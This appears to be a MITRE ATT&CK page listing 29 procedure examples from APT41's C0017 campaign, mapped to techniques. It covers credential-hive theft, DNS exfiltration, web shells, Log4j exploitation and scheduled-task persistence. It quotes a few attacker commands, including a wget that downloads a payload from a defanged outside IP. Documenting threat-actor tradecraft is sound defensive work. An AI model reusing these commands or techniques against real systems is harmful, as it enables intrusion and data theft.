ATT&CKProcedure examples

Procedure examples

Real-world descriptions of how a group, tool or campaign used a technique.

Campaign: C0017×

29 examples

TechniqueUsed byProcedure example
T1001.003
Protocol or Service Impersonation
CampaignC0017

During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.

T1003.002
Security Account Manager
CampaignC0017

During C0017, APT41 copied the `SAM` and `SYSTEM` Registry hives for credential harvesting.

T1005
Data from Local System
CampaignC0017

During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.

T1016
System Network Configuration Discovery
CampaignC0017

During C0017, APT41 used `cmd.exe /c ping %userdomain%` for discovery.

T1027
Obfuscated Files or Information
CampaignC0017

During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.

T1027.002
Software Packing
CampaignC0017

During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.

T1033
System Owner/User Discovery
CampaignC0017

During C0017, APT41 used `whoami` to gather information from victim machines.

T1036.004
Masquerade Task or Service
CampaignC0017

During C0017, APT41 used `SCHTASKS /Change` to modify legitimate scheduled tasks to run malicious code.

T1036.005
Match Legitimate Resource Name or Location
CampaignC0017

During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.

T1041
Exfiltration Over C2 Channel
CampaignC0017

During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.

T1048.003
Exfiltration Over Unencrypted Non-C2 Protocol
CampaignC0017

During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.

T1053.005
Scheduled Task
CampaignC0017

During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.

T1059.003
Windows Command Shell
CampaignC0017

During C0017, APT41 used `cmd.exe` to execute reconnaissance commands.

T1059.007
JavaScript
CampaignC0017

During C0017, APT41 deployed JScript web shells on compromised systems.

T1071.001
Web Protocols
CampaignC0017

During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.

T1074.001
Local Data Staging
CampaignC0017

During C0017, APT41 copied the local `SAM` and `SYSTEM` Registry hives to a staging directory.

T1090
Proxy
CampaignC0017

During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.

T1102
Web Service
CampaignC0017

During C0017, APT41 used the Cloudflare services for C2 communications.

T1102.001
Dead Drop Resolver
CampaignC0017

During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.

T1105
Ingress Tool Transfer
CampaignC0017

During C0017, APT41 downloaded malicious payloads onto compromised systems.

T1134
Access Token Manipulation
CampaignC0017

During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation.

T1140
Deobfuscate/Decode Files or Information
CampaignC0017

During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.

T1190
Exploit Public-Facing Application
CampaignC0017

During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.

T1505.003
Web Shell
CampaignC0017

During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.

T1560.003
Archive via Custom Method
CampaignC0017

During C0017, APT41 hex-encoded PII data prior to exfiltration.

T1567
Exfiltration Over Web Service
CampaignC0017

During C0017, APT41 used Cloudflare services for data exfiltration.

T1574
Hijack Execution Flow
CampaignC0017

During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries.

T1588.002
Tool
CampaignC0017

For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.

T1680
Local Storage Discovery
CampaignC0017

During C0017, APT41 issued `ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+` commands to find the volume serial number of compromised systems.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.